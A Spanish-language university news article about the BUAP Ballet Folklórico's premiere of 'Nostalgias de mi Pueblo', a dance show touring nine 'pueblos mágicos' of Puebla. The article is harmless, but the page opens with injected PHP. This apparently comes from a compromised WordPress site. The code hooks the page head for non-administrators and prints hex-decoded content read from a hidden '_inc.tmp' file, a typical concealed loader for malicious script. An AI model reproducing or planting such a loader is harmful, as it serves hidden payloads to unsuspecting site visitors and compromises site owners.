if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } En el CCU BUAP se estrena “Nostalgias de mi Pueblo» – La Opinión Universitaria La Opinión Universitaria
Menu

En el CCU BUAP se estrena “Nostalgias de mi Pueblo»

En un entramado multidisciplinario que combinó la danza folklórica, imágenes multimedia, música en vivo, teatro, indumentaria tradicional y una narrativa en voz en off, el Ballet Folklórico de la BUAP-CCU llevó al público por un recorrido a través de los nueve pueblos mágicos del Estado de Puebla, destacando de cada lugar su belleza natural, gastronomía, arquitectura, música, danza y tradiciones.

La función de estreno se llevó a cabo el jueves 16 de junio, en el Teatro del Complejo Cultural Universitario de la BUAP y contó con 50 bailarines en escena que recrearon las danzas más representativas de Cuetzalan, Cholula, Chignahuapan, Zacatlán, Huauchinango, Atlixco, Tlatlauquitepec, Xicotepec y Pahuatlán.

“Los pueblos mágicos son localidades que guardan entre sus calles y portales, casonas y templos, las leyendas, historia, vida cotidiana milenaria de la provincia y los encantos de nuestro pueblo”, inicia la narración del espectáculo y prepara al espectador para disfrutar este mágico recorrido.

A partir de la interpretación actoral de Marco Polo Rodríguez, quien representa a un mexicano que recién regresa de Estados Unidos para reencontrarse en su tierra natal, y la actuación de Roberto del Castillo, oriundo del Estado de Puebla, realizan un viaje a través de estos nueve pueblos mágicos.

El primer pueblo mágico en visitar es Cuetzalan y su Danza de los Migueles representada frente al tempo de San Francisco; luego Cholula con sus cientos de iglesias y la gran pirámide frente a la que interpretan Danza a Ehécatl; de ahí viajan a Chignahuapan con su bellezas naturales, aguas termales y amplia gastronomía para recrear la tradicional Danza de los Quetzales; siguiendo con Zacatlán o “lugar donde abunda el zacate”, habitada desde época prehispánica por grupos otomíes, toltecas y chichimecas, región que resguarda el Valle de las Piedras Encimadas evocan la Danza de los tejedores; y en el pueblo mágico de Huauchinango, además de sus bordados y artesanías labradas en madera, destacan las flores y aretes de totomoxtle, reproducen la Danza de Moros y Españoles.

Tras un breve intermedio, el Ballet Folklórico de la BUAP CCU interpretó cuatro números dancísticos más: Cuadrilla de Tarrasgota, de Atlixco de las Flores; Danza de los Negritos, de Tlatlauquitepec; Danza de Acatlaxquis, de Xicotepec y los Huapangos Poblanos de Pahuatlán. Estos números van acompañados de música en vivo de la banda de viento La Ley, dirigida por Francisco González, y de los músicos: Emilio Reyes, Juan Gabriel Arellano, Martina Manilla, José Gabriel Hernández y Salvador Aquino.

Para la realización del espectáculo “Nostalgias de mi Pueblo” se contó con la asesoría del arqueólogo Eduardo Merlo y la colaboración de los profesores informantes de las danzas: Juan Gabriel Arellano, Justo Hernández y Natalia Eugenia Guzmán.

El Ballet Folklórico de la BUAP CCU ofrecerá otra función del espectáculo “Nostalgias de mi pueblo”, el domingo 19 de junio, a las 12:00 horas, en el Teatro del Complejo Cultural Universitario de la BUAP. La entrada general es de 20 pesos.

No comments

Deja una respuesta

Tweets recientes